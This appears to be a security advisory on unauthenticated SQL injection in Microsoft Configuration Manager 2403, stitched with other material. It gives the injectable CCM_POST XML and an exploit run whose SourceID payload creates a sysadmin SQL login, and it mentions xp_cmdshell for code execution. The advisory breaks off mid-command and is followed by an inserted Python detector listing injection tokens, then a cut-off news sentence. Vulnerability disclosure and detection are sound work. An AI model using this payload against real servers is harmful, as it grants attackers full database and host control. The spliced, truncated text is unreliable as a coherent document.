Microsoft Configuration Manager (ConfigMgr) 2403 Unauthenticated SQL injections

16/01/2025

Description

Presentation

Microsoft Configuration Manager (a.k.a. MCM, ConfigMgr, System Center Configuration Manager or SCCM) is a systems management software product developed by Microsoft for managing large groups of computers. It provides remote control, patch management, software distribution, operating system deployment, and hardware and software inventory management.

Issue(s)

The MP_Location service, which processes messages sent by clients, uses client-supplied input unsafely when querying the site database. Two distinct SQL injection vectors were identified, neither of which requires authentication. This leads to the execution of arbitrary SQL queries as the SMS service, which has the sysadmin role. Remote code execution can also be achieved by activating the xp_cmdshell procedure.

Exploitation code is available at https://github.com/synacktiv/CVE-2024-43468.

Timeline

    Date        Description
    2024.08.05  Advisory sent to MSRC
    2024.08.22  MSRC confirmed the vulnerability
    2024.09.04  Initial hotfix released by Microsoft
    2024.09.05  Hotfix revoked by Microsoft due to an issue
    2024.09.18  Hotfix republished by Microsoft
    2024.10.08  MSRC disclosed the CVE in October's Patch Tuesday
    2025.01.16  Public release

Technical details

Unauthenticated SQL injection with MachineID

Description

Client messages targeting the MP_Location endpoint are processed by the C:\Program Files\SMS_CCM\LocationMgr.dll library. The CCM::MP::Location::CHandleLocationRequest::getMachineID function defined in that library calls the MP_GetMachineID stored procedure on the site database. The variable used to format the query string is not sanitized, and the value used as the machine identifier is taken directly from the XML documents posted by clients to the HTTP /ccm_system/request endpoint.
The latter relies on a protocol that uses the CCM_POST method and a multipart/mixed encoded body carrying two XML documents.

First, a header with the Msg root element. The injection point is the SourceID sub-element:

    <Msg ReplyCompression="zlib" SchemaVersion="1.1">
      <Body Type="ByteRange" Length="123" Offset="0" />
      <CorrelationID>{{00000000-0000-0000-0000-000000000000}}</CorrelationID>
      <Hooks>
        <Hook3 Name="zlib-compress" />
      </Hooks>
      <ID>{{00000000-0000-0000-0000-000000000000}}</ID>
      <Payload Type="inline"/>
      <Priority>0</Priority>
      <Protocol>http</Protocol>
      <ReplyMode>Sync</ReplyMode>
      <ReplyTo>direct:dummyEndpoint:LS_ReplyLocations</ReplyTo>
      <TargetAddress>mp:[http]MP_Location</TargetAddress>
      <TargetEndpoint>MP_Location</TargetEndpoint>
      <TargetHost>SCCM-MP.CORP.LOCAL</TargetHost>
      <Timeout>60000</Timeout>
      <SourceID>MACHINE_ID_INJECTION_POINT</SourceID>
    </Msg>

Secondly, a Zlib-compressed and Unicode-encoded XML body, which represents the actual request. Here the UpdateSFRequest type has to be used to reach the vulnerable function:

    <UpdateSFRequest>
      <Package ID="UID:00000000-0000-0000-0000-000000000000" Version="1"></Package>
      <ClientLocationInfo>
        <BoundaryGroups>
          <BoundaryGroup GroupID="1" GroupGUID="00000000-0000-0000-0000-000000000000" GroupFlag="0"/>
        </BoundaryGroups>
      </ClientLocationInfo>
    </UpdateSFRequest>

An unauth_sqli_LocationMgr.py script was put together to exploit this injection. It can be used as follows to execute queries and create a sysadmin user.
    $ unauth_sqli_LocationMgr.py -t sccm.corp.local -sql "create login poc_sqli_machineid with password = 'p4sswOrd'; exec master.dbo.sp_addsrvrolemember 'poc_sqli_machineid', 'sysadmin'"
    >>>> Header <<<<<
    <Msg ReplyCompression="zlib" SchemaVersion="1.1">
      <Body Type="ByteRange" Length="556" Offset="0" />
      <CorrelationID>{00000000-0000-0000-0000-000000000000}</CorrelationID>
      <Hooks>
        <Hook3 Name="zlib-compress" />
      </Hooks>
      <ID>{00000000-0000-0000-0000-000000000000}</ID>
      <Payload Type="inline"/>
      <Priority>0</Priority>
      <Protocol>http</Protocol>
      <ReplyMode>Sync</ReplyMode>
      <ReplyTo>direct:dummyEndpoint:LS_ReplyLocations</ReplyTo>
      <TargetAddress>mp:[http]MP_LocationManager</TargetAddress>
      <TargetEndpoint>MP_LocationManager</TargetEndpoint>
      <TargetHost>sccm.corp.local</TargetHost>
      <Timeout>60000</Timeout>
      <SourceID>GUID:8796f5b9-fa4b-4609-a49a-66c5a92c875e'; create login poc_sqli_machineid with password = 'p4sswOrd'; exec master.dbo.sp_addsrvrolemember 'poc_sqli_machineid', 'sysadmin' ; select '1 </SourceID>
    </Msg>
    >>>> Request <<<<<
    <UpdateSFRequest>
      <Package ID="UID:c7763df9-edf0-4cfd-918f-b6960c3a9755" Version="1"></Package>
      <ClientLocationInfo>
        <BoundaryGroups>
          <BoundaryGroup GroupID="1" GroupGUID="00000000-0000-0000-0000-000000000000" GroupFlag="0"/>
        </BoundaryGroups>
      </ClientLocationInfo>
    </UpdateSFRequest>
    >>>> Response : 200 <<<<<
    --aAbBcCdDv1234567890VxXyYzZ
    content-type: text/plain; charset=UTF-16

    ÿþNoReply
    --aAbBcCdDv1234567890VxXyYzZ--

The newly created account gives access to the CM_<SITE_CODE> database of the site.

    $ sqsh -S sccm-db.corp.local:1433 -U poc_sqli_machineid -P p4sswOrd -m vert -C "select name,sysadmin,h
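Because the injection point is a single element of a clear-text XML header, a defender who logs or proxies CCM_POST traffic to the management point can check that element before it reaches the site database. The following Python script is an added example, not part of the Synacktiv advisory or its exploit script: it splits the multipart/mixed body at the boundary, picks out the part whose root element is Msg, and flags a SourceID that does not have the GUID:<uuid> shape or that contains characters typical of T-SQL injection. The boundary string, the GUID:<uuid> shape of a legitimate SourceID and both sample bodies are assumptions built from the samples shown above; a real header carries the other elements listed above as well, which this check ignores.

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Expected shape of a legitimate client SourceID. This is an assumption based on the
# "GUID:<uuid>" value shown in the exploit output on this page; adjust it if the clients
# in your environment identify themselves differently.
SOURCE_ID_RE = re.compile(r"^GUID:[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}$")

# Tokens that never belong in a machine identifier and are characteristic of T-SQL injection.
SUSPICIOUS_TOKENS = ("'", ";", "--", "/*", "exec ", "xp_cmdshell", "sp_addsrvrolemember")

# Boundary string as it appears in the response shown on this page (assumed for the samples).
BOUNDARY = "aAbBcCdDv1234567890VxXyYzZ"


def split_multipart(body: str, boundary: str) -> list:
    """Split a multipart/mixed body into the content of each part, MIME part headers removed."""
    body = body.replace("\r\n", "\n")
    parts = []
    for chunk in body.split("--" + boundary):
        chunk = chunk.strip()
        if not chunk or chunk == "--":      # preamble / closing delimiter
            continue
        # Part headers end at the first blank line; everything after it is the content.
        _, sep, content = chunk.partition("\n\n")
        parts.append(content.strip() if sep else chunk)
    return parts


def extract_header_xml(body: str, boundary: str) -> Optional[str]:
    """Return the part whose root element is <Msg>, i.e. the client message header."""
    for part in split_multipart(body, boundary):
        if part.startswith("<Msg"):
            return part
    return None


def check_location_header(header_xml: str) -> dict:
    """Inspect a message header and report whether its SourceID looks tampered with."""
    root = ET.fromstring(header_xml)
    if root.tag != "Msg":
        raise ValueError("not a client message header")
    source_id = (root.findtext("SourceID") or "").strip()
    endpoint = (root.findtext("TargetEndpoint") or "").strip()
    findings = []
    if not SOURCE_ID_RE.match(source_id):
        findings.append("SourceID does not have the expected GUID:<uuid> shape")
    lowered = source_id.lower()
    for token in SUSPICIOUS_TOKENS:
        if token in lowered:
            findings.append(f"SourceID contains {token.strip()!r}")
    return {
        "endpoint": endpoint,
        "source_id": source_id,
        "suspicious": bool(findings),
        "findings": findings,
    }


def analyse(body: str, boundary: str = BOUNDARY) -> dict:
    """Full check on a raw CCM_POST body: locate the header part, then inspect it."""
    header = extract_header_xml(body, boundary)
    if header is None:
        return {"endpoint": "", "source_id": "", "suspicious": True,
                "findings": ["no <Msg> header part found in body"]}
    return check_location_header(header)


def build_request(source_id: str) -> str:
    """Construct a minimal CCM_POST body with the given SourceID (sample data for this example)."""
    header = (
        '<Msg ReplyCompression="zlib" SchemaVersion="1.1">'
        "<TargetEndpoint>MP_Location</TargetEndpoint>"
        "<TargetHost>SCCM-MP.CORP.LOCAL</TargetHost>"
        f"<SourceID>{source_id}</SourceID>"
        "</Msg>"
    )
    return (
        f"--{BOUNDARY}\ncontent-type: text/plain; charset=UTF-16\n\n{header}\n"
        f"--{BOUNDARY}\ncontent-type: application/octet-stream\n\n<zlib-compressed body>\n"
        f"--{BOUNDARY}--\n"
    )


# Constructed samples: the identifier from the page, once clean and once with a quote-break.
LEGIT_SOURCE_ID = "GUID:8796f5b9-fa4b-4609-a49a-66c5a92c875e"
TAMPERED_SOURCE_ID = "GUID:8796f5b9-fa4b-4609-a49a-66c5a92c875e'; select '1"

if __name__ == "__main__":
    for label, sid in (("legitimate", LEGIT_SOURCE_ID), ("tampered", TAMPERED_SOURCE_ID)):
        result = analyse(build_request(sid))
        print(f"{label}: suspicious={result['suspicious']} findings={result['findings']}")
```

The positive check against the expected identifier shape is the one that matters; the token list only makes the alert message more readable. In production the same logic would run on the request body as received by the management point's IIS front end, before decompression of the second part, since the header part is never compressed.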
Synacktiv researchers have disclosed critical unauthenticated SQL injection vulnerabilities in Microsoft Configuration Manager (